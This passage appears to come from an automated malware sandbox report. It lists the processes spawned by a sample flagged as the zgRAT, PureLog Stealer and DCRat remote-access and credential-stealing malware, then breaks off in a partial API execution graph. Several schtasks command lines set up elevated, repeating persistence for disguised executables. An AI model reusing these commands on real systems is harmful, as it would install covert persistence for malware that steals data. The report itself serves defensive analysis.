                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
                                                                                                                                  Imagebase:0x7ff67da80000
                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"
                                                                                                                                  Imagebase:0x7ff6a8000000
                                                                                                                                  File size:52'744 bytes
                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:18
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:19
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:20
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:21
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:22
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:23
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:24
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:25
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:26
                                                                                                                                  Start time:14:47:30
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:27
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:28
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"
                                                                                                                                  Imagebase:0x7ff74ba60000
                                                                                                                                  File size:289'792 bytes
                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:29
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:30
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:chcp 65001
                                                                                                                                  Imagebase:0x7ff6032c0000
                                                                                                                                  File size:14'848 bytes
                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:31
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                                  Imagebase:0x7ff70b7e0000
                                                                                                                                  File size:22'528 bytes
                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:32
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0x220000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\cmd.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:33
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0xb50000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:34
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Imagebase:0xe30000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:35
                                                                                                                                  Start time:14:47:31
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Imagebase:0xc40000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:36
                                                                                                                                  Start time:14:47:40
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:38
                                                                                                                                  Start time:14:47:40
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                                  Imagebase:0xe30000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:39
                                                                                                                                  Start time:14:47:48
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                                  Imagebase:0xc10000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:40
                                                                                                                                  Start time:14:47:57
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0x4a0000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:41
                                                                                                                                  Start time:14:48:05
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                                  Imagebase:0xde0000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:42
                                                                                                                                  Start time:14:48:14
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0x530000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:44
                                                                                                                                  Start time:14:48:23
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                                  Imagebase:0x3d0000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:45
                                                                                                                                  Start time:14:48:32
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                                  Imagebase:0x150000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Has exited:true

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:9.5%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:9.3%
                                                                                                                                    Total number of Nodes:1488
                                                                                                                                    Total number of Limit Nodes:47
                                                                                                                                    execution_graph 25305 37f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25346 37ff30 LocalFree 25270 38c030 GetProcessHeap 25306 38b4ae 27 API calls CatchGuardHandler 25271 361025 29 API calls 25331 37c220 93 API calls _swprintf 25274 38f421 21 API calls __vsnwprintf_l 25349 361710 86 API calls 25308 37ad10 73 API calls 25277 37a400 GdipDisposeImage GdipFree 25332 37d600 70 API calls 25278 386000 QueryPerformanceFrequency QueryPerformanceCounter 25310 382900 6 API calls 4 library calls 25333 38f200 51 API calls 25351 38a700 21 API calls 24076 369a74 24080 369a7e 24076->24080 24077 369ab1 24078 369b9d SetFilePointer 24078->24077 24079 369bb6 GetLastError 24078->24079 24079->24077 24080->24077 24080->24078 24081 369b79 24080->24081 24083 36981a 24080->24083 24081->24078 24084 369833 24083->24084 24086 369e80 79 API calls 24084->24086 24085 369865 24085->24081 24086->24085 25280 361075 84 API calls 25352 361f72 128 API calls __EH_prolog 25281 37a070 10 API calls 25334 37b270 99 API calls 24120 369f7a 24121 369f8f 24120->24121 24122 369f88 24120->24122 24123 369f9c GetStdHandle 24121->24123 24127 369fab 24121->24127 24123->24127 24124 36a003 WriteFile 24124->24127 24125 369fd4 WriteFile 24126 369fcf 24125->24126 24125->24127 24126->24125 24126->24127 24127->24122 24127->24124 24127->24125 24127->24126 24129 36a095 24127->24129 24131 366baa 78 API calls 24127->24131 24132 366e98 77 API calls 24129->24132 24131->24127 24132->24122 24133 388268 24144 38bb30 24133->24144 24139 388dcc _free 20 API calls 24141 3882ba 24139->24141 24140 388290 24142 388dcc _free 20 API calls 24140->24142 24143 388285 24142->24143 24143->24139 24145 38bb39 24144->24145 24146 38827a 24144->24146 24161 38ba27 24145->24161 24148 38bf30 GetEnvironmentStringsW 24146->24148 24149 38bf47 24148->24149 24159 38bf9a 24148->24159 24150 38bf4d WideCharToMultiByte 24149->24150 24153 38bf69 24150->24153 24150->24159 24151 38827f 24151->24143 24160 3882c0 26 API calls 3 library calls 24151->24160 24152 38bfa3 FreeEnvironmentStringsW 24152->24151 24154 388e06 __vsnwprintf_l 21 API calls 24153->24154 24155 38bf6f 24154->24155 24156 38bf8c 24155->24156 24157 38bf76 WideCharToMultiByte 24155->24157 24158 388dcc _free 20 API calls 24156->24158 24157->24156 24158->24159 24159->24151 24159->24152 24160->24140 24162 3897e5 _unexpected 38 API calls 24161->24162 24163 38ba34 24162->24163 24181 38bb4e 24163->24181 24165 38ba3c 24190 38b7bb 24165->24190 24168 38ba53 24168->24146 24171 38ba96 24174 388dcc _free 20 API calls 24171->24174 24174->24168 24175 38ba91 24214 3891a8 20 API calls _abort 24175->24214 24177 38bada 24177->24171 24215 38b691 26 API calls 24177->24215 24178 38baae 24178->24177 24179 388dcc _free 20 API calls 24178->24179 24179->24177 24182 38bb5a ___scrt_is_nonwritable_in_current_image 24181->24182 24183 3897e5 _unexpected 38 API calls 24182->24183 24188 38bb64 24183->24188 24185 38bbe8 _abort 24185->24165 24188->24185 24189 388dcc _free 20 API calls 24188->24189 24216 388d24 38 API calls _abort 24188->24216 24217 38ac31 EnterCriticalSection 24188->24217 24218 38bbdf LeaveCriticalSection _abort 24188->24218 24189->24188 24191 384636 __fassign 38 API calls 24190->24191 24192 38b7cd 24191->24192 24193 38b7dc GetOEMCP 24192->24193 24194 38b7ee 24192->24194 24195 38b805 24193->24195 24194->24195 24196 38b7f3 GetACP 24194->24196 24195->24168 24197 388e06 24195->24197 24196->24195 24198 388e44 24197->24198 24202 388e14 _abort 24197->24202 24220 3891a8 20 API calls _abort 24198->24220 24200 388e2f RtlAllocateHeap 24201 388e42 24200->24201 24200->24202 24201->24171 24204 38bbf0 24201->24204 24202->24198 24202->24200 24219 387a5e 7 API calls 2 library calls 24202->24219 24205 38b7bb 40 API calls 24204->24205 24206 38bc0f 24205->24206 24209 38bc60 IsValidCodePage 24206->24209 24211 38bc16 24206->24211 24213 38bc85 __cftof 